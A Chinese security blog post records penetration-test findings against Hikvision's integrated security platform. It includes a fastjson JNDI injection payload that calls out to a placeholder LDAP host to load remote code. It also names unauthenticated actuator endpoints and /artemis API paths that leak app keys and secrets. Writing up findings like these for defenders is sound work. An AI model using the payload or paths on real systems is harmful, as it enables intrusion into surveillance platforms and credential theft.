海康综合安防平台测试记录

admin 2024年10月13日21:23:05评论9 views字数 1259阅读4分11秒阅读模式

在一次测试过程中,发现安防平台的actuator相关问题,于是便记录一下平常会测试的几个点。

0x01:fastjson

这是公开比较长时间的漏洞了,在接口:/bic/ssoService/v1/applyCT中直接构造fastjson poc

诸如:

{"a": {"@type":"java.lang.Class","val":"com.sun.rowset.JdbcRowSetImpl"},"b": {"@type":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"ldap://xxx:1389/TomcatBypass/TomcatEcho","autoCommit":true}}

0x02: actuator未授权

在之前的寻找key和secret的用法中,在官方文档提供的代码能,总是能发现如下内容

海康综合安防平台测试记录

即总是会请求一个接口为:/artemis,于是找到安防平台将其拼接在url后

海康综合安防平台测试记录

出现了经典的404界面,于是目录扫描了一下

海康综合安防平台测试记录

可以看到存在大量的敏感actuator端点,例如常用的env与heapdump

海康综合安防平台测试记录

trace端点

海康综合安防平台测试记录

利用泄露的token和sign接口构造请求

海康综合安防平台测试记录

即可获取安防平台的内容,当然具体其他接口可以参考官方文档

https://open.hikvision.com/docs/docId?productId=5c67f1e2f05948198c909700&version=%2F8058f5f3c4384ae18d3f6c1bdf2d9c05

海康综合安防平台测试记录

0x03:key与secret泄露

之前的几次测试中,没有发现mappings端点,在某个系统中发现存在此端点,apikit直接给把接口列出来了

海康综合安防平台测试记录

此网站的接口没有进行鉴权,可以直接构造请求,在测试了几个接口后,发现了如下的一些接口可以直接获取key与secret

/artemis/statistic/node/statisticIndex /artemis/consumerinfo/getApiConsumerAppKeyList?appKey=xxx /artemis/consumerinfo/getApiConsumerNameList?cName= /artemis/consumerinfo/showApiConsumer

海康综合安防平台测试记录
海康综合安防平台测试记录

有了key和secret之后,又回到了之前文章中说的key和secret的利用问题,可参考之前的文章《记一次海康AK凭证泄漏下的利用》,

总结

当然这里的几个actuator问题并不是指的通杀问题,只是部分适用。可以将其添加到nuc或者自用的扫描工具中进行扫描,从而快速发现问题。

因为在实际测试的过程中,可能会出现诸如:存在actuator没mappings,存在mappings无key和secret的获取接口,actuator端点没有想要的内容等等。

本来所涉及到的网站,均在授权下进行测试。本文只是做一个分享,请勿做未授权的测试

原文始发于微信公众号(Str1am Record):海康综合安防平台测试记录

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年10月13日21:23:05
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   海康综合安防平台测试记录https://cn-sec.com/archives/1998264.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息